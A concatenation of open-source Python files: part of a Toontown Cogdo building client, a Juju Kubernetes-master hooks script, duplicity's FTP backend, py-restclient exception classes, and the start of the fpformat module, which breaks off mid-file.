elevOut = self.floorModel.find(CogdoGameConsts.PenthouseElevatorOutPath)
frame = self.elevatorModelOut.find('**/frame')
if not frame.isEmpty():
frame.hide()
frame = self.elevatorModelIn.find('**/frame')
if not frame.isEmpty():
frame.hide()
self.elevatorModelOut.reparentTo(elevOut)
self.elevatorModelOut.setY(0)
else:
elevIn = self.floorModel.find('**/elevator-in')
elevOut = self.floorModel.find('**/elevator-out')
elif self._wantBarrelRoom and self.barrelRoom.isLoaded() and self.currentFloor == 2 and self.FOType == 'l':
elevIn = self.barrelRoom.model.find(CogdoBarrelRoomConsts.BarrelRoomElevatorInPath)
elevOut = self.barrelRoom.model.find(CogdoBarrelRoomConsts.BarrelRoomElevatorOutPath)
y = elevOut.getY(render)
elevOut = elevOut.copyTo(render)
elevOut.setY(render, y - 0.75)
else:
floorModel = loader.loadModel('phase_7/models/modules/boss_suit_office')
elevIn = floorModel.find('**/elevator-in').copyTo(render)
elevOut = floorModel.find('**/elevator-out').copyTo(render)
floorModel.removeNode()
self.elevIn = elevIn
self.elevOut = elevOut
self._haveEntranceElevator.set(True)
for index in xrange(len(self.suits)):
if not self.suits[index].isEmpty():
self.suits[index].setPos(SuitPositions[index])
if len(self.suits) > 2:
self.suits[index].setH(SuitHs[index])
else:
self.suits[index].setH(170)
self.suits[index].loop('neutral')
for toon in self.toons:
toon.reparentTo(self.elevatorModelIn)
index = self.toonIds.index(toon.doId)
toon.setPos(ElevatorPoints[index][0], ElevatorPoints[index][1], ElevatorPoints[index][2])
toon.setHpr(180, 0, 0)
toon.loop('neutral')
self.elevatorModelIn.reparentTo(elevIn)
self.leftDoorIn.setPos(3.5, 0, 0)
self.rightDoorIn.setPos(-3.5, 0, 0)
camera.reparentTo(self.elevatorModelIn)
camera.setH(180)
camera.setP(0)
camera.setPos(0, 14, 4)
base.playMusic(self.elevatorMusic, looping=1, volume=0.8)
track = Sequence(Func(base.transitions.noTransitions), ElevatorUtils.getRideElevatorInterval(ELEVATOR_NORMAL), ElevatorUtils.getOpenInterval(self, self.leftDoorIn, self.rightDoorIn, self.openSfx, None, type=ELEVATOR_NORMAL), Func(camera.wrtReparentTo, render))
for toon in self.toons:
track.append(Func(toon.wrtReparentTo, render))
track.append(Func(callback))
track.start(ts)
self.activeIntervals[name] = track
return
def enterElevator(self, ts = 0):
if not self._CogdoGameRepeat:
self.currentFloor += 1
self.cr.playGame.getPlace().currentFloor = self.currentFloor
self.setElevatorLights(self.elevatorModelIn)
self.setElevatorLights(self.elevatorModelOut)
if not self.isBossFloor(self.currentFloor):
self.elevatorModelOut.detachNode()
messenger.send('sellbotFieldOfficeChanged', [True])
elif self.FOType == 's':
self._movie = CogdoElevatorMovie()
self._movie.load()
self._movie.play()
self.__playElevator(ts, self.elevatorName, self.__handleElevatorDone)
def __handleElevatorDone(self):
self.d_elevatorDone()
def exitElevator(self):
self.elevatorMusic.stop()
if self._movie:
self._movie.end()
self.__cleanupPenthouseIntro()
self.__finishInterval(self.elevatorName)
def __setupBarrelRoom(self):
self.currentFloor += 1
base.transitions.irisOut(0.0)
self.elevatorModelOut.setY(-12)
self.elevatorModelIn.reparentTo(self.barrelRoom.model.find(CogdoBarrelRoomConsts.BarrelRoomElevatorInPath))
self.leftDoorIn.setPos(3.5, 0, 0)
self.rightDoorIn.setPos(-3.5, 0, 0)
self._showExitElevator()
self.barrelRoom.show()
self.barrelRoom.placeToonsAtEntrance(self.toons)
self.setElevatorLights(self.elevatorModelOut)
def barrelRoomIntroDone(self):
self.sendUpdate('toonBarrelRoomIntroDone', [])
def enterBarrelRoomIntro(self, ts = 0):
if not self.isBossFloor(self.currentFloor):
if self._wantBarrelRoom:
self.__setupBarrelRoom()
self.barrelRoomIntroTrack, trackName = self.barrelRoom.getIntroInterval()
self.barrelRoomIntroDoneEvent = trackName
self.accept(self.barrelRoomIntroDoneEvent, self.barrelRoomIntroDone)
self.activeIntervals[trackName] = self.barrelRoomIntroTrack
self.barrelRoomIntroTrack.start(ts)
self._movie = CogdoBarrelRoomIntro()
self._movie.load()
self._movie.play()
else:
self._showExitElevator()
def exitBarrelRoomIntro(self):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
self.ignore(self.barrelRoomIntroDoneEvent)
if self.barrelRoomIntroTrack:
self.barrelRoomIntroTrack.finish()
DelayDelete.cleanupDelayDeletes(self.barrelRoomIntroTrack)
self.barrelRoomIntroTrack = None
return
def __handleLocalToonLeftBarrelRoom(self):
self.notify.info('Local toon teleported out of barrel room.')
self.sendUpdate('toonLeftBarrelRoom', [])
self.barrelRoom.deactivate()
def enterCollectBarrels(self, ts = 0):
if not self.isBossFloor(self.currentFloor):
if self._wantBarrelRoom:
self.acceptOnce('localToonLeft', self.__handleLocalToonLeftBarrelRoom)
self.barrelRoom.activate()
base.playMusic(self.waitMusic, looping=1, volume=0.7)
def exitCollectBarrels(self):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
self.ignore('localToonLeft')
self.barrelRoom.deactivate()
self.waitMusic.stop()
def __brRewardDone(self, task = None):
self.notify.info('Toon finished watching the barrel room reward.')
self.sendUpdate('toonBarrelRoomRewardDone', [])
self.fsm.request('Battle')
def enterBarrelRoomReward(self, ts = 0):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
base.cr.playGame.getPlace().fsm.request('stopped')
self.startAlertElevatorLightIval(self.elevatorModelOut)
track, trackName = self.barrelRoom.showRewardUi(callback=self.__brRewardDone)
self.activeIntervals[trackName] = track
track.start()
self.barrelRoom.placeToonsNearBattle(self.toons)
def exitBarrelRoomReward(self):
if self._wantBarrelRoom and not self.isBossFloor(self.currentFloor):
base.cr.playGame.getPlace().fsm.request('walk')
self.stopAlertElevatorLightIval(self.elevatorModelOut)
self.barrelRoom.hideRewardUi()
def enterBattleIntro(self, ts = 0):
self._movie = CogdoExecutiveSuiteIntro(self.shopOwnerNpc)
self._movie.load()
self._movie.play()
def exitBattleIntro(self):
self._movie.end()
self.__cleanupPenthouseIntro()
def _showExitElevator(self):
self.elevatorModelOut.reparentTo(self.elevOut)
self.leftDoorOut.setPos(3.5, 0, 0)
self.rightDoorOut.setPos(-3.5, 0, 0)
def __playCloseElevatorOut(self, name):
track = Sequence(Wait(SUIT_LEAVE_ELEVATOR_TIME + 4), Parallel(SoundInterval(self.closeSfx), LerpPosInterval(self.leftDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], ElevatorUtils.getLeftClosePoint(ELEVATOR_NORMAL), startPos=Point3(0, 0, 0), blendType='easeOut'), LerpPosInterval(self.rightDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], ElevatorUtils.getRightClosePoint(ELEVATOR_NORMAL), startPos=Point3(0, 0, 0), blendType='easeOut')))
track.start()
self.activeIntervals[name] = track
def enterBattle(self, ts = 0):
if self.elevatorOutOpen:
try:
self.__playCloseElevatorOut(self.uniqueName('close-out-elevator'))
except:
pass
camera.setPos(0, -15, 4)
camera.headsUp(self.elevatorModelOut)
def exitBattle(self):
if self.elevatorOutOpen:
try:
self.__finishInterval(self.uniqueName('close-out-elevator'))
except:
pass
self.elevatorOutOpen = 0
def __playReservesJoining(self, ts, name, callback):
try:
for i, suit in enumerate(self.joiningReserves):
suit.reparentTo(render)
suit.setPos(self.elevatorModelOut, Point3(ElevatorPoints[i][0], ElevatorPoints[i][1], ElevatorPoints[i][2]))
suit.setH(180)
suit.loop('neutral')
track = Sequence(Func(camera.wrtReparentTo, self.elevatorModelOut), Func(camera.setPos, Point3(0, -8, 2)), Func(camera.setHpr, Vec3(0, 10, 0)), Parallel(SoundInterval(self.openSfx), LerpPosInterval(self.leftDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], Point3(0, 0, 0), startPos=ElevatorUtils.getLeftClosePoint(ELEVATOR_NORMAL), blendType='easeOut'), LerpPosInterval(self.rightDoorOut, ElevatorData[ELEVATOR_NORMAL]['closeTime'], Point3(0, 0, 0), startPos=ElevatorUtils.getRightClosePoint(ELEVATOR_NORMAL), blendType='easeOut')), Wait(SUIT_HOLD_ELEVATOR_TIME), Func(camera.wrtReparentTo, render), Func(callback))
track.start(ts)
if len(self.suits) - len(self.joiningReserves) <= 0:
self.elevatorOutOpen = 1
self.activeIntervals[name] = track
except:
callback()
def enterReservesJoining(self, ts = 0):
self.__playReservesJoining(ts, self.uniqueName('reserves-joining'), self.__handleReserveJoinDone)
def __handleReserveJoinDone(self):
self.joiningReserves = []
self.d_reserveJoinDone()
def exitReservesJoining(self):
self.__finishInterval(self.uniqueName('reserves-joining'))
def enterResting(self, ts = 0):
self._showExitElevator()
self._setAvPosFDC = FrameDelayedCall('setAvPos', self._setAvPosToExit)
if self._wantBarrelRoom:
self.barrelRoom.showBattleAreaLight(True)
base.playMusic(self.waitMusic, looping=1, volume=0.7)
self.__closeInElevator()
self._haveEntranceElevator.set(False)
self._stashEntranceElevator.set(False)
def _setAvPosToExit(self):
base.localAvatar.setPos(self.elevOut, 0, -22, 0)
base.localAvatar.setHpr(self.elevOut, 0, 0, 0)
base.cr.playGame.getPlace().fsm.request('walk')
def exitResting(self):
self._setAvPosFDC.destroy()
self.waitMusic.stop()
def enterReward(self, ts = 0):
if self.isBossFloor(self.currentFloor):
self.penthouseOutroTrack = self.__outroPenthouse()
self.penthouseOutroTrack.start(ts)
else:
self.exitCogdoBuilding()
def exitReward(self):
self.notify.debug('exitReward')
if self.penthouseOutroTrack:
self.penthouseOutroTrack.finish()
DelayDelete.cleanupDelayDeletes(self.penthouseOutroTrack)
self.penthouseOutroTrack = None
if not self.penthouseOutroChatDoneTrack:
self.notify.debug('exitReward: instanting outroPenthouseChatDone track')
self.__outroPenthouseChatDone()
self.penthouseOutroChatDoneTrack.finish()
self.penthouseOutroChatDoneTrack = None
return
def enterFailed(self, ts = 0):
self.exitCogdoBuilding()
def exitFailed(self):
self.notify.debug('exitFailed()')
self.exitCogdoBuilding()
def exitCogdoBuilding(self):
if base.localAvatar.hp < 0:
return
else:
base.localAvatar.b_setParent(ToontownGlobals.SPHidden)
request = {'loader': ZoneUtil.getBranchLoaderName(self.extZoneId),
'where': ZoneUtil.getToonWhereName(self.extZoneId),
'how': 'elevatorIn',
'hoodId': ZoneUtil.getHoodId(self.extZoneId),
'zoneId': self.extZoneId,
'shardId': None,
'avId': -1,
'bldgDoId': self.distBldgDoId}
messenger.send('DSIDoneEvent', [request])
return
def displayBadges(self):
numFloors = self.layout.getNumGameFloors()
if numFloors > 5 or numFloors < 3:
pass
else:
self.notify.warning('Invalid floor number for display badges.')
for player in xrange(len(self.toons)):
goldBadge = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_goldTrophy')
goldBadge.setScale(1.2)
goldNode = render.find('**/gold_0' + str(player + 1))
goldBadge.reparentTo(goldNode)
for floor in xrange(numFloors):
silverBadge = loader.loadModel('phase_5/models/cogdominium/tt_m_ara_crg_silverTrophy')
silverBadge.setScale(1.2)
silverNode = render.find('**/silver_0' + str(floor * 4 + (player + 1)))
silverBadge.reparentTo(silverNode)
def __outroPenthouse(self):
avatar = base.localAvatar
trackName = '__outroPenthouse-%d' % avatar.doId
track = Parallel(name=trackName)
base.cr.playGame.getPlace().fsm.request('stopped')
if self.FOType == 'l':
speech = TTLocalizer.CogdoExecutiveSuiteToonThankYouLawbot
else:
speech = TTLocalizer.CogdoExecutiveSuiteToonThankYou % self.SOSToonName
track.append(Sequence(Func(camera.wrtReparentTo, localAvatar), Func(camera.setPos, 0, -9, 9), Func(camera.lookAt, Point3(5, 15, 0)), Parallel(self.cage.posInterval(0.75, self.cagePos[1], blendType='easeOut'), SoundInterval(self.cageLowerSfx, duration=0.5)), Parallel(self.cageDoor.hprInterval(0.5, VBase3(0, 90, 0), blendType='easeOut'), Sequence(SoundInterval(self.cageDoorSfx), duration=0)), Wait(0.25), Func(self.shopOwnerNpc.wrtReparentTo, render), Func(self.shopOwnerNpc.setScale, 1), Func(self.shopOwnerNpc.loop, 'walk'), Func(self.shopOwnerNpc.headsUp, Point3(0, 10, 0)), ParallelEndTogether(self.shopOwnerNpc.posInterval(1.5, Point3(0, 10, 0)), self.shopOwnerNpc.hprInterval(0.5, VBase3(180, 0, 0), blendType='easeInOut')), Func(self.shopOwnerNpc.setChatAbsolute, TTLocalizer.CagedToonYippee, CFSpeech), ActorInterval(self.shopOwnerNpc, 'jump'), Func(self.shopOwnerNpc.loop, 'neutral'), Func(self.shopOwnerNpc.headsUp, localAvatar), Func(self.shopOwnerNpc.setLocalPageChat, speech, 0), Func(camera.lookAt, self.shopOwnerNpc, Point3(0, 0, 2))))
self.activeIntervals[trackName] = track
self.acceptOnce(self.shopOwnerNpc.uniqueName('doneChatPage'), self.__outroPenthouseChatDone)
return track
def __outroPenthouseChatDone(self, elapsed = None):
self.shopOwnerNpc.setChatAbsolute(TTLocalizer.CogdoExecutiveSuiteToonBye, CFSpeech)
track = Parallel(Sequence(ActorInterval(self.shopOwnerNpc, 'wave'), Func(self.shopOwnerNpc.loop, 'neutral')), Sequence(Wait(2.0), Func(self.exitCogdoBuilding), Func(base.camLens.setFov, settings['fov'])))
track.start()
self.penthouseOutroChatDoneTrack = track | apache-2.0 |
thucatebay/kubernetes | cluster/juju/charms/trusty/kubernetes-master/hooks/hooks.py | 52 | 11792 | #!/usr/bin/env python
# Copyright 2015 The Kubernetes Authors All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
The main hook file is called by Juju.
"""
import contextlib
import os
import socket
import subprocess
import sys
from charmhelpers.core import hookenv, host
from charmhelpers.contrib import ssl
from kubernetes_installer import KubernetesInstaller
from path import Path
hooks = hookenv.Hooks()
@contextlib.contextmanager
def check_sentinel(filepath):
"""
A context manager method to write a file while the code block is doing
something and remove the file when done.
"""
fail = False
try:
yield filepath.exists()
except:
fail = True
filepath.touch()
raise
finally:
if fail is False and filepath.exists():
filepath.remove()
@hooks.hook('config-changed')
def config_changed():
"""
On the execution of the juju event 'config-changed' this function
determines the appropriate architecture and the configured version to
create kubernetes binary files.
"""
hookenv.log('Starting config-changed')
charm_dir = Path(hookenv.charm_dir())
config = hookenv.config()
# Get the version of kubernetes to install.
version = config['version']
username = config['username']
password = config['password']
certificate = config['apiserver-cert']
key = config['apiserver-key']
if version == 'master':
# The 'master' branch of kuberentes is used when master is configured.
branch = 'master'
elif version == 'local':
# Check for kubernetes binaries in the local files/output directory.
branch = None
else:
# Create a branch to a tag to get the release version.
branch = 'tags/{0}'.format(version)
cert_file = '/srv/kubernetes/apiserver.crt'
key_file = '/srv/kubernetes/apiserver.key'
# When the cert or key changes we need to restart the apiserver.
if config.changed('apiserver-cert') or config.changed('apiserver-key'):
hookenv.log('Certificate or key has changed.')
if not certificate or not key:
generate_cert(key=key_file, cert=cert_file)
else:
hookenv.log('Writing new certificate and key to server.')
with open(key_file, 'w') as file:
file.write(key)
with open(cert_file, 'w') as file:
file.write(certificate)
# Restart apiserver as the certificate or key has changed.
if host.service_running('apiserver'):
host.service_restart('apiserver')
# Reload nginx because it proxies https to apiserver.
if host.service_running('nginx'):
host.service_reload('nginx')
if config.changed('username') or config.changed('password'):
hookenv.log('Username or password changed, creating authentication.')
basic_auth(config['username'], config['username'], config['password'])
if host.service_running('apiserver'):
host.service_restart('apiserver')
# Get package architecture, rather than arch from the kernel (uname -m).
arch = subprocess.check_output(['dpkg', '--print-architecture']).strip()
if not branch:
output_path = charm_dir / 'files/output'
kube_installer = KubernetesInstaller(arch, version, output_path)
else:
# Build the kuberentes binaries from source on the units.
kubernetes_dir = Path('/opt/kubernetes')
# Construct the path to the binaries using the arch.
output_path = kubernetes_dir / '_output/local/bin/linux' / arch
kube_installer = KubernetesInstaller(arch, version, output_path)
if not kubernetes_dir.exists():
message = 'The kubernetes source directory {0} does not exist. ' \
'Was the kubernetes repository cloned during the install?'
print(message.format(kubernetes_dir))
exit(1)
# Change to the kubernetes directory (git repository).
with kubernetes_dir:
# Create a command to get the current branch.
git_branch = 'git branch | grep "\*" | cut -d" " -f2'
current_branch = subprocess.check_output(git_branch, shell=True)
current_branch = current_branch.strip()
print('Current branch: ', current_branch)
# Create the path to a file to indicate if the build was broken.
broken_build = charm_dir / '.broken_build'
# write out the .broken_build file while this block is executing.
with check_sentinel(broken_build) as last_build_failed:
print('Last build failed: ', last_build_failed)
# Rebuild if current version is different or last build failed.
if current_branch != version or last_build_failed:
kube_installer.build(branch)
if not output_path.isdir():
broken_build.touch()
# Create the symoblic links to the right directories.
kube_installer.install()
relation_changed()
hookenv.log('The config-changed hook completed successfully.')
@hooks.hook('etcd-relation-changed', 'minions-api-relation-changed')
def relation_changed():
template_data = get_template_data()
# Check required keys
for k in ('etcd_servers',):
if not template_data.get(k):
print 'Missing data for', k, template_data
return
print 'Running with\n', template_data
# Render and restart as needed
for n in ('apiserver', 'controller-manager', 'scheduler'):
if render_file(n, template_data) or not host.service_running(n):
host.service_restart(n)
# Render the file that makes the kubernetes binaries available to minions.
if render_file(
'distribution', template_data,
'conf.tmpl', '/etc/nginx/sites-enabled/distribution') or \
not host.service_running('nginx'):
host.service_reload('nginx')
# Render the default nginx template.
if render_file(
'nginx', template_data,
'conf.tmpl', '/etc/nginx/sites-enabled/default') or \
not host.service_running('nginx'):
host.service_reload('nginx')
# Send api endpoint to minions
notify_minions()
@hooks.hook('network-relation-changed')
def network_relation_changed():
relation_id = hookenv.relation_id()
hookenv.relation_set(relation_id, ignore_errors=True)
def notify_minions():
print('Notify minions.')
config = hookenv.config()
for r in hookenv.relation_ids('minions-api'):
hookenv.relation_set(
r,
hostname=hookenv.unit_private_ip(),
port=8080,
version=config['version'])
print('Notified minions of version ' + config['version'])
def basic_auth(name, id, pwd=None, file='/srv/kubernetes/basic-auth.csv'):
"""
Create a basic authentication file for kubernetes. The file is a csv file
with 3 columns: password, user name, user id. From the Kubernetes docs:
The basic auth credentials last indefinitely, and the password cannot be
changed without restarting apiserver.
"""
if not pwd:
import random
import string
alphanumeric = string.ascii_letters + string.digits
pwd = ''.join(random.choice(alphanumeric) for _ in range(16))
lines = []
auth_file = Path(file)
if auth_file.isfile():
lines = auth_file.lines()
for line in lines:
target = ',{0},{1}'.format(name, id)
if target in line:
lines.remove(line)
auth_line = '{0},{1},{2}'.format(pwd, name, id)
lines.append(auth_line)
auth_file.write_lines(lines)
def generate_cert(common_name=None,
key='/srv/kubernetes/apiserver.key',
cert='/srv/kubernetes/apiserver.crt'):
"""
Create the certificate and key for the Kubernetes tls enablement.
"""
hookenv.log('Generating new self signed certificate and key', 'INFO')
if not common_name:
common_name = hookenv.unit_get('public-address')
if os.path.isfile(key) or os.path.isfile(cert):
hookenv.log('Overwriting the existing certificate or key', 'WARNING')
hookenv.log('Generating certificate for {0}'.format(common_name), 'INFO')
# Generate the self signed certificate with the public address as CN.
# https://pythonhosted.org/charmhelpers/api/charmhelpers.contrib.ssl.html
ssl.generate_selfsigned(key, cert, cn=common_name)
def get_template_data():
rels = hookenv.relations()
config = hookenv.config()
version = config['version']
template_data = {}
template_data['etcd_servers'] = ','.join([
'http://%s:%s' % (s[0], s[1]) for s in sorted(
get_rel_hosts('etcd', rels, ('hostname', 'port')))])
template_data['minions'] = ','.join(get_rel_hosts('minions-api', rels))
private_ip = hookenv.unit_private_ip()
public_ip = hookenv.unit_public_ip()
template_data['api_public_address'] = _bind_addr(public_ip)
template_data['api_private_address'] = _bind_addr(private_ip)
template_data['bind_address'] = '127.0.0.1'
template_data['api_http_uri'] = 'http://%s:%s' % (private_ip, 8080)
template_data['api_https_uri'] = 'https://%s:%s' % (private_ip, 6443)
arch = subprocess.check_output(['dpkg', '--print-architecture']).strip()
template_data['web_uri'] = '/kubernetes/%s/local/bin/linux/%s/' % (version,
arch)
if version == 'local':
template_data['alias'] = hookenv.charm_dir() + '/files/output/'
else:
directory = '/opt/kubernetes/_output/local/bin/linux/%s/' % arch
template_data['alias'] = directory
_encode(template_data)
return template_data
def _bind_addr(addr):
if addr.replace('.', '').isdigit():
return addr
try:
return socket.gethostbyname(addr)
except socket.error:
raise ValueError('Could not resolve address %s' % addr)
def _encode(d):
for k, v in d.items():
if isinstance(v, unicode):
d[k] = v.encode('utf8')
def get_rel_hosts(rel_name, rels, keys=('private-address',)):
hosts = []
for r, data in rels.get(rel_name, {}).items():
for unit_id, unit_data in data.items():
if unit_id == hookenv.local_unit():
continue
values = [unit_data.get(k) for k in keys]
if not all(values):
continue
hosts.append(len(values) == 1 and values[0] or values)
return hosts
def render_file(name, data, src_suffix='upstart.tmpl', tgt_path=None):
tmpl_path = os.path.join(
os.environ.get('CHARM_DIR'), 'files', '%s.%s' % (name, src_suffix))
with open(tmpl_path) as fh:
tmpl = fh.read()
rendered = tmpl % data
if tgt_path is None:
tgt_path = '/etc/init/%s.conf' % name
if os.path.exists(tgt_path):
with open(tgt_path) as fh:
contents = fh.read()
if contents == rendered:
return False
with open(tgt_path, 'w') as fh:
fh.write(rendered)
return True
if __name__ == '__main__':
hooks.execute(sys.argv)
| apache-2.0 |
andreagrandi/duplicity-sx | duplicity/backends/ftpbackend.py | 2 | 4952 | # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*-
#
# Copyright 2002 Ben Escoto <ben@emerose.org>
# Copyright 2007 Kenneth Loafman <kenneth@loafman.com>
#
# This file is part of duplicity.
#
# Duplicity is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the
# Free Software Foundation; either version 2 of the License, or (at your
# option) any later version.
#
# Duplicity is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with duplicity; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
import os.path
import urllib
import duplicity.backend
from duplicity import globals
from duplicity import log
from duplicity import tempdir
class FTPBackend(duplicity.backend.Backend):
"""Connect to remote store using File Transfer Protocol"""
def __init__(self, parsed_url):
duplicity.backend.Backend.__init__(self, parsed_url)
# we expect an error return, so go low-level and ignore it
try:
p = os.popen("ncftpls -v")
fout = p.read()
ret = p.close()
except Exception:
pass
# the expected error is 8 in the high-byte and some output
if ret != 0x0800 or not fout:
log.FatalError("NcFTP not found: Please install NcFTP version 3.1.9 or later",
log.ErrorCode.ftp_ncftp_missing)
# version is the second word of the first line
version = fout.split('\n')[0].split()[1]
if version < "3.1.9":
log.FatalError("NcFTP too old: Duplicity requires NcFTP version 3.1.9,"
"3.2.1 or later. Version 3.2.0 will not work properly.",
log.ErrorCode.ftp_ncftp_too_old)
elif version == "3.2.0":
log.Warn("NcFTP (ncftpput) version 3.2.0 may fail with duplicity.\n"
"see: http://www.ncftpd.com/ncftp/doc/changelog.html\n"
"If you have trouble, please upgrade to 3.2.1 or later",
log.WarningCode.ftp_ncftp_v320)
log.Notice("NcFTP version is %s" % version)
self.parsed_url = parsed_url
self.url_string = duplicity.backend.strip_auth_from_url(self.parsed_url)
# This squelches the "file not found" result from ncftpls when
# the ftp backend looks for a collection that does not exist.
# version 3.2.2 has error code 5, 1280 is some legacy value
self.popen_breaks[ 'ncftpls' ] = [ 5, 1280 ]
# Use an explicit directory name.
if self.url_string[-1] != '/':
self.url_string += '/'
self.password = self.get_password()
if globals.ftp_connection == 'regular':
self.conn_opt = '-E'
else:
self.conn_opt = '-F'
self.tempfile, self.tempname = tempdir.default().mkstemp()
os.write(self.tempfile, "host %s\n" % self.parsed_url.hostname)
os.write(self.tempfile, "user %s\n" % self.parsed_url.username)
os.write(self.tempfile, "pass %s\n" % self.password)
os.close(self.tempfile)
self.flags = "-f %s %s -t %s -o useCLNT=0,useHELP_SITE=0 " % \
(self.tempname, self.conn_opt, globals.timeout)
if parsed_url.port != None and parsed_url.port != 21:
self.flags += " -P '%s'" % (parsed_url.port)
def _put(self, source_path, remote_filename):
remote_path = os.path.join(urllib.unquote(self.parsed_url.path.lstrip('/')), remote_filename).rstrip()
commandline = "ncftpput %s -m -V -C '%s' '%s'" % \
(self.flags, source_path.name, remote_path)
self.subprocess_popen(commandline)
def _get(self, remote_filename, local_path):
remote_path = os.path.join(urllib.unquote(self.parsed_url.path), remote_filename).rstrip()
commandline = "ncftpget %s -V -C '%s' '%s' '%s'" % \
(self.flags, self.parsed_url.hostname, remote_path.lstrip('/'), local_path.name)
self.subprocess_popen(commandline)
def _list(self):
# Do a long listing to avoid connection reset
commandline = "ncftpls %s -l '%s'" % (self.flags, self.url_string)
_, l, _ = self.subprocess_popen(commandline)
# Look for our files as the last element of a long list line
return [x.split()[-1] for x in l.split('\n') if x and not x.startswith("total ")]
def _delete(self, filename):
commandline = "ncftpls %s -l -X 'DELE %s' '%s'" % \
(self.flags, filename, self.url_string)
self.subprocess_popen(commandline)
duplicity.backend.register_backend("ftp", FTPBackend)
| gpl-2.0 |
wishtack/py-restclient | restclient/errors.py | 1 | 2603 | # -*- coding: utf-8 -
#
# Copyright (c) 2008, 2009 Benoit Chesneau <benoitc@e-engura.com>
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
"""
exception classes.
"""
class ResourceError(Exception):
def __init__(self, msg=None, http_code=None, response=None):
self.msg = msg or ''
self.status_code = http_code
self.response = response
Exception.__init__(self)
def _get_message(self):
return self.msg
def _set_message(self, msg):
self.msg = msg or ''
message = property(_get_message, _set_message)
def __str__(self):
if self.msg:
return self.msg
try:
return self._fmt % self.__dict__
except (NameError, ValueError, KeyError) as e:
return 'Unprintable exception %s: %s' \
% (self.__class__.__name__, str(e))
class ResourceNotFound(ResourceError):
"""Exception raised when no resource was found at the given url.
"""
class Unauthorized(ResourceError):
"""Exception raised when an authorization is required to access to
the resource specified.
"""
class RequestFailed(ResourceError):
"""Exception raised when an unexpected HTTP error is received in response
to a request.
The request failed, meaning the remote HTTP server returned a code
other than success, unauthorized, or NotFound.
The exception message attempts to extract the error
You can get the status code by e.http_code, or see anything about the
response via e.response. For example, the entire result body (which is
probably an HTML error page) is e.response.body.
"""
class RequestError(Exception):
"""Exception raised when a request is malformed"""
class InvalidUrl(Exception):
"""
Not a valid url for use with this software.
"""
class TransportError(Exception):
"""Error raised by a transport """ | isc |
WhireCrow/openwrt-mt7620 | staging_dir/target-mipsel_r2_uClibc-0.9.33.2/usr/lib/python2.7/fpformat.py | 322 | 4699 | """General floating point formatting functions.
Functions:
fix(x, digits_behind)
sci(x, digits_behind)
Each takes a number or a string and a number of digits as arguments.
Parameters:
x: number to be formatted; or a string resembling a number
digits_behind: number of digits behind the decimal point
"""
from warnings import warnpy3k
warnpy3k("the fpformat module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
import re
__all__ = ["fix","sci","NotANumber"]
# Compiled regular expression to "decode" a number
decoder = re.compile(r'^([-+]?)0*(\d*)((?:\.\d*)?)(([eE][-+]?\d+)?)$')
# \0 the whole thing
# \1 leading sign or empty
# \2 digits left of decimal point
# \3 fraction (empty or begins with point)
# \4 exponent part (empty or begins with 'e' or 'E')
try:
class NotANumber(ValueError):
pass
except TypeError:
NotANumber = 'fpformat.NotANumber'
def extract(s):
"""Return (sign, intpart, fraction, expo) or raise an exception:
sign is '+' or '-'
intpart is 0 or more digits beginning with a nonzero
fraction is 0 or more digits
expo is an integer"""
res = decoder.match(s)
if res is None: raise NotANumber, s
sign, intpart, fraction, exppart = res.group(1,2,3,4)
if sign == '+': sign = ''
if fraction: fraction = fraction[1:]
if exppart: expo = int(exppart[1:])
else: expo = 0
return sign, intpart, fraction, expo
def unexpo(intpart, fraction, expo):
"""Remove the exponent by changing intpart and fraction."""
if expo > 0: # Move the point left
f = len(fraction)
intpart, fraction = intpart + fraction[:expo], fraction[expo:]
if expo > f:
intpart = intpart + '0'*(expo-f)
elif expo < 0: # Move the point right
i = len(intpart)
intpart, fraction = intpart[:expo], intpart[expo:] + fraction
if expo < -i:
fraction = '0'*(-expo-i) + fraction
return intpart, fraction
def roundfrac(intpart, fraction, digs):
"""Round or extend the fraction to size digs."""
f = len(fraction)
if f <= digs:
return intpart, fraction + '0'*(digs-f)
i = len(intpart)
if i+digs < 0:
return '0'*-digs, ''
total = intpart + fraction
nextdigit = total[i+digs]
if nextdigit >= '5': # Hard case: increment last digit, may have carry!
n = i + digs - 1
while n >= 0:
if total[n] != '9': break
n = n-1
else:
total = '0' + total
i = i+1
n = 0
total = total[:n] + chr(ord(total[n]) + 1) + '0'*(len(total)-n-1)
intpart, fraction = total[:i], total[i:]
if digs >= 0:
return intpart, fraction[:digs]
else:
return intpart[:digs] + '0'*-digs, ''
def fix(x, digs):
